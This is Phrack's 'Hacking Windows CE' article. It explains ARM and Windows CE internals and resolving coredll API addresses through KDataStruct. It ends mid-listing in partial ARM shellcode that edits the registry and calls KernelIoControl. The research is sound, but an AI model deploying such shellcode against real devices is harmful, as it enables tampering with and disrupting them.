1434 lines
52 KiB
Plaintext
1434 lines
52 KiB
Plaintext
==Phrack Inc.==
|
||
|
||
Volume 0x0b, Issue 0x3f, Phile #0x06 of 0x14
|
||
|
||
|=----------------------------------------------------------------------=|
|
||
|=----------------------=[ Hacking Windows CE ]=------------------------=|
|
||
|=----------------------------------------------------------------------=|
|
||
|=----------------------=[ san <san@xfocus.org> ]=----------------------=|
|
||
|
||
--[ Contents
|
||
|
||
1 - Abstract
|
||
|
||
2 - Windows CE Overview
|
||
|
||
3 - ARM Architecture
|
||
|
||
4 - Windows CE Memory Management
|
||
|
||
5 - Windows CE Processes and Threads
|
||
|
||
6 - Windows CE API Address Search Technology
|
||
|
||
7 - The Shellcode for Windows CE
|
||
|
||
8 - System Call
|
||
|
||
9 - Windows CE Buffer Overflow Exploitation
|
||
|
||
10 - About Decoding Shellcode
|
||
|
||
11 - Conclusion
|
||
|
||
12 - Greetings
|
||
|
||
13 - References
|
||
|
||
|
||
--[ 1 - Abstract
|
||
|
||
The network features of PDAs and mobiles are becoming more and more
|
||
powerful, so their related security problems are attracting more and more
|
||
attentions. This paper will show a buffer overflow exploitation example
|
||
in Windows CE. It will cover knowledges about ARM architecture, memory
|
||
management and the features of processes and threads of Windows CE. It
|
||
also shows how to write a shellcode in Windows CE, including knowledges
|
||
about decoding shellcode of Windows CE with ARM processor.
|
||
|
||
|
||
--[ 2 - Windows CE Overview
|
||
|
||
Windows CE is a very popular embedded operating system for PDAs and
|
||
mobiles. As the name, it's developed by Microsoft. Because of the similar
|
||
APIs, the Windows developers can easily develop applications for Windows
|
||
CE. Maybe this is an important reason that makes Windows CE popular.
|
||
Windows CE 5.0 is the latest version, but Windows CE.net(4.2) is the most
|
||
useful version, and this paper is based on Windows CE.net.
|
||
|
||
For marketing reason, Windows Mobile Software for Pocket PC and Smartphone
|
||
are considered as independent products, but they are also based on the
|
||
core of Windows CE.
|
||
|
||
By default, Windows CE is in little-endian mode and it supports several
|
||
processors.
|
||
|
||
|
||
--[ 3 - ARM Architecture
|
||
|
||
ARM processor is the most popular chip in PDAs and mobiles, almost all of
|
||
the embedded devices use ARM as CPU. ARM processors are typical RISC
|
||
processors in that they implement a load/store architecture. Only load and
|
||
store instructions can access memory. Data processing instructions operate
|
||
on register contents only.
|
||
|
||
There are six major versions of ARM architecture. These are denoted by
|
||
the version numbers 1 to 6.
|
||
|
||
ARM processors support up to seven processor modes, depending on the
|
||
architecture version. These modes are: User, FIQ-Fast Interrupt Request,
|
||
IRQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System
|
||
mode requires ARM architecture v4 and above. All modes except User mode
|
||
are referred to as privileged mode. Applications usually execute in User
|
||
mode, but on Pocket PC all applications appear to run in kernel mode, and
|
||
we'll talk about it late.
|
||
|
||
ARM processors have 37 registers. The registers are arranged in partially
|
||
overlapping banks. There is a different register bank for each processor
|
||
mode. The banked registers give rapid context switching for dealing with
|
||
processor exceptions and privileged operations.
|
||
|
||
In ARM architecture v3 and above, there are 30 general-purpose 32-bit
|
||
registers, the program counter(pc) register, the Current Program Status
|
||
Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen
|
||
general-purpose registers are visible at any one time, depending on the
|
||
current processor mode. The visible general-purpose registers are from r0
|
||
to r14.
|
||
|
||
By convention, r13 is used as a stack pointer(sp) in ARM assembly language.
|
||
The C and C++ compilers always use r13 as the stack pointer.
|
||
|
||
In User mode and System mode, r14 is used as a link register(lr) to store
|
||
the return address when a subroutine call is made. It can also be used as
|
||
a general-purpose register if the return address is stored in the stack.
|
||
|
||
The program counter is accessed as r15(pc). It is incremented by four
|
||
bytes for each instruction in ARM state, or by two bytes in Thumb state.
|
||
Branch instructions load the destination address into the pc register.
|
||
|
||
You can load the pc register directly using data operation instructions.
|
||
This feature is different from other processors and it is useful while
|
||
writing shellcode.
|
||
|
||
|
||
--[ 4 - Windows CE Memory Management
|
||
|
||
Understanding memory management is very important for buffer overflow
|
||
exploit. The memory management of Windows CE is very different from other
|
||
operating systems, even other Windows systems.
|
||
|
||
Windows CE uses ROM (read only memory) and RAM (random access memory).
|
||
|
||
The ROM stores the entire operating system, as well as the applications
|
||
that are bundled with the system. In this sense, the ROM in a Windows CE
|
||
system is like a small read-only hard disk. The data in ROM can be
|
||
maintained without power of battery. ROM-based DLL files can be designated
|
||
as Execute in Place. XIP is a new feature of Windows CE.net. That is,
|
||
they're executed directly from the ROM instead of being loaded into
|
||
program RAM and then executed. It is a big advantage for embedded systems.
|
||
The DLL code doesn't take up valuable program RAM and it doesn't have to
|
||
be copied into RAM before it's launched. So it takes less time to start an
|
||
application. DLL files that aren't in ROM but are contained in the object
|
||
store or on a Flash memory storage card aren't executed in place; they're
|
||
copied into the RAM and then executed.
|
||
|
||
The RAM in a Windows CE system is divided into two areas: program memory
|
||
and object store.
|
||
|
||
The object store can be considered something like a permanent virtual RAM
|
||
disk. Unlike the RAM disks on a PC, the object store maintains the files
|
||
stored in it even if the system is turned off. This is the reason that
|
||
Windows CE devices typically have a main battery and a backup battery.
|
||
They provide power for the RAM to maintain the files in the object store.
|
||
Even when the user hits the reset button, the Windows CE kernel starts up
|
||
looking for a previously created object store in RAM and uses that store
|
||
if it finds one.
|
||
|
||
Another area of the RAM is used for the program memory. Program memory is
|
||
used like the RAM in personal computers. It stores the heaps and stacks
|
||
for the applications that are running. The boundary between the object
|
||
store and the program RAM is adjustable. The user can move the dividing
|
||
line between object store and program RAM using the System Control Panel
|
||
applet.
|
||
|
||
Windows CE is a 32-bit operating system, so it supports 4GB virtual
|
||
address space. The layout is as following:
|
||
|
||
+----------------------------------------+ 0xFFFFFFFF
|
||
| | | Kernel Virtual Address: |
|
||
| | 2 | KPAGE Trap Area, |
|
||
| | G | KDataStruct, etc |
|
||
| | B | ... |
|
||
| | |--------------------------------+ 0xF0000000
|
||
| 4 | K | Static Mapped Virtual Address |
|
||
| G | E | ... |
|
||
| B | R | ... |
|
||
| | N |--------------------------------+ 0xC4000000
|
||
| V | E | NK.EXE |
|
||
| I | L |--------------------------------+ 0xC2000000
|
||
| R | | ... |
|
||
| T | | ... |
|
||
| U |---|--------------------------------+ 0x80000000
|
||
| A | | Memory Mapped Files |
|
||
| L | 2 | ... |
|
||
| | G |--------------------------------+ 0x42000000
|
||
| A | B | Slot 32 Process 32 |
|
||
| D | |--------------------------------+ 0x40000000
|
||
| D | U | ... |
|
||
| R | S |--------------------------------+ 0x08000000
|
||
| E | E | Slot 3 DEVICE.EXE |
|
||
| S | R |--------------------------------+ 0x06000000
|
||
| S | | Slot 2 FILESYS.EXE |
|
||
| | |--------------------------------+ 0x04000000
|
||
| | | Slot 1 XIP DLLs |
|
||
| | |--------------------------------+ 0x02000000
|
||
| | | Slot 0 Current Process |
|
||
+---+---+--------------------------------+ 0x00000000
|
||
|
||
The upper 2GB is kernel space, used by the system for its own data. And
|
||
the lower 2GB is user space. From 0x42000000 to below 0x80000000 memories
|
||
are used for large memory allocations, such as memory-mapped files, object
|
||
store is in here. From 0 to below 0x42000000 memories are divided into 33
|
||
slots, each of which is 32MB.
|
||
|
||
Slot 0 is very important; it's for the currently running process. The
|
||
virtual address space layout is as following:
|
||
|
||
+---+------------------------------------+ 0x02000000
|
||
| | DLL Virtual Memory Allocations |
|
||
| S | +--------------------------------|
|
||
| L | | ROM DLLs:R/W Data |
|
||
| O | |--------------------------------|
|
||
| T | | RAM DLL+OverFlow ROM DLL: |
|
||
| 0 | | Code+Data |
|
||
| | +--------------------------------|
|
||
| C +------+-----------------------------|
|
||
| U | A |
|
||
| R V | |
|
||
| R +-------------------------+----------|
|
||
| E | General Virtual Memory Allocations|
|
||
| N | +--------------------------------|
|
||
| T | | Process VirtualAlloc() calls |
|
||
| | |--------------------------------|
|
||
| P | | Thread Stack |
|
||
| R | |--------------------------------|
|
||
| O | | Process Heap |
|
||
| C | |--------------------------------|
|
||
| E | | Thread Stack |
|
||
| S |---+--------------------------------|
|
||
| S | Process Code and Data |
|
||
| |------------------------------------+ 0x00010000
|
||
| | Guard Section(64K)+UserKInfo |
|
||
+---+------------------------------------+ 0x00000000
|
||
|
||
First 64 KB reserved by the OS. The process' code and data are mapped from
|
||
0x00010000, then followed by stacks and heaps. DLLs loaded into the top
|
||
address. One of the new features of Windows CE.net is the expansion of an
|
||
application's virtual address space from 32 MB, in earlier versions of
|
||
Windows CE, to 64 MB, because the Slot 1 is used as XIP.
|
||
|
||
|
||
--[ 5 - Windows CE Processes and Threads
|
||
|
||
Windows CE treats processes in a different way from other Windows systems.
|
||
Windows CE limits 32 processes being run at any one time. When the system
|
||
starts, at least four processes are created: NK.EXE, which provides the
|
||
kernel service, it's always in slot 97; FILESYS.EXE, which provides file
|
||
system service, it's always in slot 2; DEVICE.EXE, which loads and
|
||
maintains the device drivers for the system, it's in slot 3 normally; and
|
||
GWES.EXE, which provides the GUI support, it's in slot 4 normally. The
|
||
other processes are also started, such as EXPLORER.EXE.
|
||
|
||
Shell is an interesting process because it's not even in the ROM.
|
||
SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
|
||
The only way to load it is by connecting the system to the PC debugging
|
||
station so that the file can be automatically downloaded from the PC. When
|
||
you use Platform Builder to debug the Windows CE system, the SHELL.EXE
|
||
will be loaded into the slot after FILESYS.EXE.
|
||
|
||
Threads under Windows CE are similar to threads under other Windows
|
||
systems. Each process at least has a primary thread associated with it
|
||
upon starting even if it never explicitly created one. And a process can
|
||
create any number of additional threads, it's only limited by available
|
||
memory.
|
||
|
||
Each thread belongs to a particular process and shares the same memory
|
||
space. But SetProcPermissions(-1) gives the current thread access to any
|
||
process. Each thread has an ID, a private stack and a set of registers.
|
||
The stack size of all threads created within a process is set by the
|
||
linker when the application is compiled.
|
||
|
||
The IDs of process and thread in Windows CE are the handles of the
|
||
corresponding process and thread. It's funny, but it's useful while
|
||
programming.
|
||
|
||
When a process is loaded, system will assign the next available slot to it
|
||
. DLLs loaded into the slot and then followed by the stack and default
|
||
process heap. After this, then executed.
|
||
|
||
When a process' thread is scheduled, system will copy from its slot into
|
||
slot 0. It isn't a real copy operation; it seems just mapped into slot 0.
|
||
This is mapped back to the original slot allocated to the process if the
|
||
process becomes inactive. Kernel, file system, windowing system all runs
|
||
in their own slots
|
||
|
||
Processes allocate stack for each thread, the default size is 64KB,
|
||
depending on link parameter when the program is compiled. The top 2KB is
|
||
used to guard against stack overflow, we can't destroy this memory,
|
||
otherwise, the system will freeze. And the remained available for use.
|
||
|
||
Variables declared inside functions are allocated in the stack. Thread's
|
||
stack memory is reclaimed when it terminates.
|
||
|
||
|
||
--[ 6 - Windows CE API Address Search Technology
|
||
|
||
We must have a shellcode to run under Windows CE before exploit. Windows
|
||
CE implements as Win32 compatibility. Coredll provides the entry points
|
||
for most APIs supported by Windows CE. So it is loaded by every process.
|
||
The coredll.dll is just like the kernel32.dll and ntdll.dll of other Win32
|
||
systems. We have to search necessary API addresses from the coredll.dll
|
||
and then use these APIs to implement our shellcode. The traditional method
|
||
to implement shellcode under other Win32 systems is to locate the base
|
||
address of kernel32.dll via PEB structure and then search API addresses
|
||
via PE header.
|
||
|
||
Firstly, we have to locate the base address of the coredll.dll. Is there a
|
||
structure like PEB under Windows CE? The answer is yes. KDataStruct is an
|
||
important kernel structure that can be accessed from user mode using the
|
||
fixed address PUserKData and it keeps important system data, such as
|
||
module list, kernel heap, and API set pointer table (SystemAPISets).
|
||
|
||
KDataStruct is defined in nkarm.h:
|
||
|
||
// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
|
||
struct KDataStruct {
|
||
LPDWORD lpvTls; /* 0x000 Current thread local storage pointer */
|
||
HANDLE ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
|
||
char bResched; /* 0x084 reschedule flag */
|
||
char cNest; /* 0x085 kernel exception nesting */
|
||
char bPowerOff; /* 0x086 TRUE during "power off" processing */
|
||
char bProfileOn; /* 0x087 TRUE if profiling enabled */
|
||
ulong unused; /* 0x088 unused */
|
||
ulong rsvd2; /* 0x08c was DiffMSec */
|
||
PPROCESS pCurPrc; /* 0x090 ptr to current PROCESS struct */
|
||
PTHREAD pCurThd; /* 0x094 ptr to current THREAD struct */
|
||
DWORD dwKCRes; /* 0x098 */
|
||
ulong handleBase; /* 0x09c handle table base address */
|
||
PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */
|
||
LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
|
||
LPVOID alpvIntrData[SYSINTR_MAX_DEVICES]; /* 0x220 */
|
||
ulong pAPIReturn; /* 0x2a0 direct API return address for kernel mode */
|
||
uchar *pMap; /* 0x2a4 ptr to MemoryMap array */
|
||
DWORD dwInDebugger; /* 0x2a8 !0 when in debugger */
|
||
PTHREAD pCurFPUOwner; /* 0x2ac current FPU owner */
|
||
PPROCESS pCpuASIDPrc; /* 0x2b0 current ASID proc */
|
||
long nMemForPT; /* 0x2b4 - Memory used for PageTables */
|
||
|
||
long alPad[18]; /* 0x2b8 - padding */
|
||
DWORD aInfo[32]; /* 0x300 - misc. kernel info */
|
||
// WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
|
||
#define KINX_PROCARRAY 0 /* 0x300 address of process array */
|
||
#define KINX_PAGESIZE 1 /* 0x304 system page size */
|
||
#define KINX_PFN_SHIFT 2 /* 0x308 shift for page # in PTE */
|
||
#define KINX_PFN_MASK 3 /* 0x30c mask for page # in PTE */
|
||
#define KINX_PAGEFREE 4 /* 0x310 # of free physical pages */
|
||
#define KINX_SYSPAGES 5 /* 0x314 # of pages used by kernel */
|
||
#define KINX_KHEAP 6 /* 0x318 ptr to kernel heap array */
|
||
#define KINX_SECTIONS 7 /* 0x31c ptr to SectionTable array */
|
||
#define KINX_MEMINFO 8 /* 0x320 ptr to system MemoryInfo struct */
|
||
#define KINX_MODULES 9 /* 0x324 ptr to module list */
|
||
#define KINX_DLL_LOW 10 /* 0x328 lower bound of DLL shared space */
|
||
#define KINX_NUMPAGES 11 /* 0x32c total # of RAM pages */
|
||
#define KINX_PTOC 12 /* 0x330 ptr to ROM table of contents */
|
||
#define KINX_KDATA_ADDR 13 /* 0x334 kernel mode version of KData */
|
||
#define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */
|
||
#define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */
|
||
#define KINX_PENDEVENTS 16 /* 0x340 bit mask for pending interrupt events */
|
||
#define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */
|
||
#define KINX_API_MASK 18 /* 0x348 bit mask for registered api sets */
|
||
#define KINX_NLS_CP 19 /* 0x34c hiword OEM code page, loword ANSI code page */
|
||
#define KINX_NLS_SYSLOC 20 /* 0x350 Default System locale */
|
||
#define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */
|
||
#define KINX_HEAP_WASTE 22 /* 0x358 Kernel heap wasted space */
|
||
#define KINX_DEBUGGER 23 /* 0x35c For use by debugger for protocol communication */
|
||
#define KINX_APISETS 24 /* 0x360 APIset pointers */
|
||
#define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */
|
||
#define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */
|
||
#define KINX_NKSECTION 27 /* 0x36c Address of NKSection */
|
||
#define KINX_PWR_EVTS 28 /* 0x370 Events to be set after power on */
|
||
|
||
#define KINX_NKSIG 31 /* 0x37c last entry of KINFO -- signature when NK is ready */
|
||
#define NKSIG 0x4E4B5347 /* signature "NKSG" */
|
||
/* 0x380 - interlocked api code */
|
||
/* 0x400 - end */
|
||
}; /* KDataStruct */
|
||
|
||
/* High memory layout
|
||
*
|
||
* This structure is mapped in at the end of the 4GB virtual
|
||
* address space.
|
||
*
|
||
* 0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
|
||
* 0xFFFD4000 - disabled for protection
|
||
* 0xFFFE0000 - second level page tables (uncached)
|
||
* 0xFFFE4000 - disabled for protection
|
||
* 0xFFFF0000 - exception vectors
|
||
* 0xFFFF0400 - not used (r/o)
|
||
* 0xFFFF1000 - disabled for protection
|
||
* 0xFFFF2000 - r/o (physical overlaps with vectors)
|
||
* 0xFFFF2400 - Interrupt stack (1k)
|
||
* 0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
|
||
* 0xFFFF3000 - disabled for protection
|
||
* 0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)
|
||
* 0xFFFF4900 - Abort stack (2k - 256 bytes)
|
||
* 0xFFFF5000 - disabled for protection
|
||
* 0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
|
||
* 0xFFFF6800 - FIQ stack (256 bytes)
|
||
* 0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
|
||
* 0xFFFF7000 - disabled
|
||
* 0xFFFFC000 - kernel stack
|
||
* 0xFFFFC800 - KDataStruct
|
||
* 0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)
|
||
*/
|
||
|
||
|
||
The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and
|
||
0x00005800 on other CPUs. The last member of KDataStruct is aInfo. It
|
||
offsets 0x300 from the start address of KDataStruct structure. Member
|
||
aInfo is a DWORD array, there is a pointer to module list in index
|
||
9(KINX_MODULES), and it's defined in pkfuncs.h. So offsets 0x324 from
|
||
0xFFFFC800 is the pointer to the module list.
|
||
|
||
Well, let's look at the Module structure. I marked the offsets of the
|
||
Module structure as following:
|
||
|
||
// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
|
||
typedef struct Module {
|
||
LPVOID lpSelf; /* 0x00 Self pointer for validation */
|
||
PMODULE pMod; /* 0x04 Next module in chain */
|
||
LPWSTR lpszModName; /* 0x08 Module name */
|
||
DWORD inuse; /* 0x0c Bit vector of use */
|
||
DWORD calledfunc; /* 0x10 Called entry but not exit */
|
||
WORD refcnt[MAX_PROCESSES]; /* 0x14 Reference count per process*/
|
||
LPVOID BasePtr; /* 0x54 Base pointer of dll load (not 0 based) */
|
||
DWORD DbgFlags; /* 0x58 Debug flags */
|
||
LPDBGPARAM ZonePtr; /* 0x5c Debug zone pointer */
|
||
ulong startip; /* 0x60 0 based entrypoint */
|
||
openexe_t oe; /* 0x64 Pointer to executable file handle */
|
||
e32_lite e32; /* 0x74 E32 header */
|
||
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
|
||
typedef struct e32_lite { /* PE 32-bit .EXE header */
|
||
unsigned short e32_objcnt; /* 0x74 Number of memory objects */
|
||
BYTE e32_cevermajor; /* 0x76 version of CE built for */
|
||
BYTE e32_ceverminor; /* 0x77 version of CE built for */
|
||
unsigned long e32_stackmax; /* 0x78 Maximum stack size */
|
||
unsigned long e32_vbase; /* 0x7c Virtual base address of module */
|
||
unsigned long e32_vsize; /* 0x80 Virtual size of the entire image */
|
||
unsigned long e32_sect14rva; /* 0x84 section 14 rva */
|
||
unsigned long e32_sect14size; /* 0x88 section 14 size */
|
||
struct info e32_unit[LITE_EXTRA]; /* 0x8c Array of extra info units */
|
||
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
|
||
struct info { /* Extra information header block */
|
||
unsigned long rva; /* Virtual relative address of info */
|
||
unsigned long size; /* Size of information block */
|
||
}
|
||
// WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
|
||
#define EXP 0 /* 0x8c Export table position */
|
||
#define IMP 1 /* 0x94 Import table position */
|
||
#define RES 2 /* 0x9c Resource table position */
|
||
#define EXC 3 /* 0xa4 Exception table position */
|
||
#define SEC 4 /* 0xac Security table position */
|
||
#define FIX 5 /* 0xb4 Fixup table position */
|
||
|
||
#define LITE_EXTRA 6 /* Only first 6 used by NK */
|
||
} e32_lite, *LPe32_list;
|
||
o32_lite *o32_ptr; /* 0xbc O32 chain ptr */
|
||
DWORD dwNoNotify; /* 0xc0 1 bit per process, set if notifications disabled */
|
||
WORD wFlags; /* 0xc4 */
|
||
BYTE bTrustLevel; /* 0xc6 */
|
||
BYTE bPadding; /* 0xc7 */
|
||
PMODULE pmodResource; /* 0xc8 module that contains the resources */
|
||
DWORD rwLow; /* 0xcc base address of RW section for ROM DLL */
|
||
DWORD rwHigh; /* 0xd0 high address RW section for ROM DLL */
|
||
PGPOOL_Q pgqueue; /* 0xcc list of the page owned by the module */
|
||
} Module;
|
||
|
||
|
||
Module structure is defined in kernel.h. The third member of Module
|
||
structure is lpszModName, which is the module name string pointer and it
|
||
offsets 0x08 from the start of the Module structure. The Module name is
|
||
unicode string. The second member of Module structure is pMod, which is an
|
||
address that point to the next module in chain. So we can locate the
|
||
coredll module by comparing the unicode string of its name.
|
||
|
||
Offsets 0x74 from the start of Module structure has an e32 member and it
|
||
is an e32_lite structure. Let's look at the e32_lite structure, which
|
||
defined in pehdr.h. In the e32_lite structure, member e32_vbase will tell
|
||
us the virtual base address of the module. It offsets 0x7c from the start
|
||
of Module structure. We else noticed the member of e32_unit[LITE_EXTRA],
|
||
it is an info structure array. LITE_EXTRA is defined to 6 in the head of
|
||
pehdr.h, only the first 6 used by NK and the first is export table position.
|
||
So offsets 0x8c from the start of Module structure is the virtual relative
|
||
address of export table position of the module.
|
||
|
||
From now on, we got the virtual base address of the coredll.dll and its
|
||
virtual relative address of export table position.
|
||
|
||
I wrote the following small program to list all modules of the system:
|
||
|
||
; SetProcessorMode.s
|
||
|
||
AREA |.text|, CODE, ARM
|
||
|
||
EXPORT |SetProcessorMode|
|
||
|SetProcessorMode| PROC
|
||
mov r1, lr ; different modes use different lr - save it
|
||
msr cpsr_c, r0 ; assign control bits of CPSR
|
||
mov pc, r1 ; return
|
||
|
||
END
|
||
|
||
// list.cpp
|
||
/*
|
||
...
|
||
01F60000 coredll.dll
|
||
*/
|
||
|
||
#include "stdafx.h"
|
||
|
||
extern "C" void __stdcall SetProcessorMode(DWORD pMode);
|
||
|
||
int WINAPI WinMain( HINSTANCE hInstance,
|
||
HINSTANCE hPrevInstance,
|
||
LPTSTR lpCmdLine,
|
||
int nCmdShow)
|
||
{
|
||
FILE *fp;
|
||
unsigned int KDataStruct = 0xFFFFC800;
|
||
void *Modules = NULL,
|
||
*BaseAddress = NULL,
|
||
*DllName = NULL;
|
||
|
||
// switch to user mode
|
||
//SetProcessorMode(0x10);
|
||
|
||
if ( (fp = fopen("\\modules.txt", "w")) == NULL )
|
||
{
|
||
return 1;
|
||
}
|
||
|
||
// aInfo[KINX_MODULES]
|
||
Modules = *( ( void ** )(KDataStruct + 0x324));
|
||
|
||
while (Modules) {
|
||
BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
|
||
DllName = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );
|
||
|
||
fprintf(fp, "%08X %ls\n", BaseAddress, DllName);
|
||
|
||
Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
|
||
}
|
||
|
||
fclose(fp);
|
||
return(EXIT_SUCCESS);
|
||
}
|
||
|
||
In my environment, the Module structure is 0x8F453128 which in the kernel
|
||
space. Most of Pocket PC ROMs were builded with Enable Full Kernel Mode
|
||
option, so all applications appear to run in kernel mode. The first 5 bits
|
||
of the Psr register is 0x1F when debugging, that means the ARM processor
|
||
runs in system mode. This value defined in nkarm.h:
|
||
|
||
// ARM processor modes
|
||
#define USER_MODE 0x10 // 0b10000
|
||
#define FIQ_MODE 0x11 // 0b10001
|
||
#define IRQ_MODE 0x12 // 0b10010
|
||
#define SVC_MODE 0x13 // 0b10011
|
||
#define ABORT_MODE 0x17 // 0b10111
|
||
#define UNDEF_MODE 0x1b // 0b11011
|
||
#define SYSTEM_MODE 0x1f // 0b11111
|
||
|
||
I wrote a small function in assemble to switch processor mode because the
|
||
EVC doesn't support inline assemble. The program won't get the value of
|
||
BaseAddress and DllName when I switched the processor to user mode. It
|
||
raised a access violate exception.
|
||
|
||
I use this program to get the virtual base address of the coredll.dll is
|
||
0x01F60000 without change processor mode. But this address is invalid when
|
||
I use EVC debugger to look into and the valid data is start from
|
||
0x01F61000. I think maybe Windows CE is for the purpose of save memory
|
||
space or time, so it doesn't load the header of dll files.
|
||
|
||
Because we've got the virtual base address of the coredll.dll and its
|
||
virtual relative address of export table position, so through repeat
|
||
compare the API name by IMAGE_EXPORT_DIRECTORY structure, we can get the
|
||
API address. IMAGE_EXPORT_DIRECTORY structure is just like other Win32
|
||
system's, which defined in winnt.h:
|
||
|
||
// WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
|
||
typedef struct _IMAGE_EXPORT_DIRECTORY {
|
||
DWORD Characteristics; /* 0x00 */
|
||
DWORD TimeDateStamp; /* 0x04 */
|
||
WORD MajorVersion; /* 0x08 */
|
||
WORD MinorVersion; /* 0x0a */
|
||
DWORD Name; /* 0x0c */
|
||
DWORD Base; /* 0x10 */
|
||
DWORD NumberOfFunctions; /* 0x14 */
|
||
DWORD NumberOfNames; /* 0x18 */
|
||
DWORD AddressOfFunctions; // 0x1c RVA from base of image
|
||
DWORD AddressOfNames; // 0x20 RVA from base of image
|
||
DWORD AddressOfNameOrdinals; // 0x24 RVA from base of image
|
||
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
|
||
|
||
|
||
--[ 7 - The Shellcode for Windows CE
|
||
|
||
There are something to notice before writing shellcode for Windows CE.
|
||
Windows CE uses r0-r3 as the first to fourth parameters of API, if the
|
||
parameters of API larger than four that Windows CE will use stack to store
|
||
the other parameters. So it will be careful to write shellcode, because
|
||
the shellcode will stay in the stack. The test.asm is our shellcode:
|
||
|
||
; Idea from WinCE4.Dust written by Ratter/29A
|
||
;
|
||
; API Address Search
|
||
; san@xfocus.org
|
||
;
|
||
; armasm test.asm
|
||
; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj
|
||
|
||
CODE32
|
||
|
||
EXPORT WinMainCRTStartup
|
||
|
||
AREA .text, CODE, ARM
|
||
|
||
test_start
|
||
|
||
; r11 - base pointer
|
||
test_code_start PROC
|
||
bl get_export_section
|
||
|
||
mov r2, #4 ; functions number
|
||
bl find_func
|
||
|
||
sub sp, sp, #0x89, 30 ; weird after buffer overflow
|
||
|
||
add r0, sp, #8
|
||
str r0, [sp]
|
||
mov r3, #2
|
||
mov r2, #0
|
||
adr r1, key
|
||
mov r0, #0xA, 2
|
||
mov lr, pc
|
||
ldr pc, [r8, #-12] ; RegOpenKeyExW
|
||
|
||
mov r0, #1
|
||
str r0, [sp, #0xC]
|
||
mov r3, #4
|
||
str r3, [sp, #4]
|
||
add r1, sp, #0xC
|
||
str r1, [sp]
|
||
;mov r2, #0
|
||
adr r1, val
|
||
ldr r0, [sp, #8]
|
||
mov lr, pc
|
||
ldr pc, [r8, #-8] ; RegSetValueExW
|
||
|
||
ldr r0, [sp, #8]
|
||
mov lr, pc
|
||
ldr pc, [r8, #-4] ; RegCloseKey
|
||
|
||
adr r0, sf
|
||
ldr r0, [r0]
|
||
;ldr r0, =0x0101003c
|
||
mov r1, #0
|
||
mov r2, #0
|
||
mov r3, #0
|
||
mov lr, pc
|
||
ldr pc, [r8, #-16] ; KernelIoControl
|
||
|
||
; basic wide string compare
|
||
wstrcmp PROC
|
||
wstrcmp_iterate
|
||
ldrh r2, [r0], #2
|
||
ldrh r3, [r1], #2
|
||
|
||
cmp r2, #0
|
||
cmpeq r3, #0
|
||
moveq pc, lr
|
||
|
||
cmp r2, r3
|
||
beq wstrcmp_iterate
|
||
|
||
mov pc, lr
|
||
ENDP
|
||
|
||
; output:
|
||
; r0 - coredll base addr
|
||
; r1 - export section addr
|
||
get_export_section PROC
|
||
mov r11, lr
|
||
adr r4, kd
|
||
ldr r4, [r4]
|
||
;ldr r4, =0xffffc800 ; KDataStruct
|
||
ldr r5, =0x324 ; aInfo[KINX_MODULES]
|
||
|
||
add r5, r4, r5
|
||
ldr r5, [r5]
|
||
|
||
; r5 now points to first module
|
||
|
||
mov r6, r5
|
||
mov r7, #0
|
||
|
||
iterate
|
||
ldr r0, [r6, #8] ; get dll name
|
||
adr r1, coredll
|
||
bl wstrcmp ; compare with coredll.dll
|
||
|
||
ldreq r7, [r6, #0x7c] ; get dll base
|
||
ldreq r8, [r6, #0x8c] ; get export section rva
|
||
|
||
add r9, r7, r8
|
||
beq got_coredllbase ; is it what we're looking for?
|
||
|
||
ldr r6, [r6, #4]
|
||
cmp r6, #0
|
||
cmpne r6, r5
|
||
bne iterate ; nope, go on
|
||
|
||
got_coredllbase
|
||
mov r0, r7
|
||
add r1, r8, r7 ; yep, we've got imagebase
|
||
; and export section pointer
|
||
|
||
mov pc, r11
|
||
ENDP
|
||
|
||
; r0 - coredll base addr
|
||
; r1 - export section addr
|
||
; r2 - function name addr
|
||
find_func PROC
|
||
adr r8, fn
|
||
find_func_loop
|
||
ldr r4, [r1, #0x20] ; AddressOfNames
|
||
add r4, r4, r0
|
||
|
||
mov r6, #0 ; counter
|
||
|
||
find_start
|
||
ldr r7, [r4], #4
|
||
add r7, r7, r0 ; function name pointer
|
||
;mov r8, r2 ; find function name
|
||
|
||
mov r10, #0
|
||
hash_loop
|
||
ldrb r9, [r7], #1
|
||
cmp r9, #0
|
||
beq hash_end
|
||
add r10, r9, r10, ROR #7
|
||
b hash_loop
|
||
|
||
hash_end
|
||
ldr r9, [r8]
|
||
cmp r10, r9 ; compare the hash
|
||
addne r6, r6, #1
|
||
bne find_start
|
||
|
||
ldr r5, [r1, #0x24] ; AddressOfNameOrdinals
|
||
add r5, r5, r0
|
||
add r6, r6, r6
|
||
ldrh r9, [r5, r6] ; Ordinals
|
||
ldr r5, [r1, #0x1c] ; AddressOfFunctions
|
||
add r5, r5, r0
|
||
